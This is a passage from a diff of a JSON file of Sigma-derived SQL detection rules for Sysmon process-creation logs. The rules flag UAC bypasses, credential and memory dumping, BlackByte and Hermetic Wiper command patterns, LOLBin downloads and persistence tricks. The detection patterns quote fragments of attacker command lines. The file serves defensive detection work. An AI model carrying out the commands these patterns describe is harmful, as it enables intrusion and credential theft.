LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - 
"attack.exfiltration" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR 
OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" - ], + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", - "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": 
"c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "status": "test", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Some rare backup scenarios" + 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", - "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. 
This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": 
"Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + 
"attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + 
"author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image 
File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", - "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": 
"ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "status": "test", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Suspicious Windows Defender Registry 
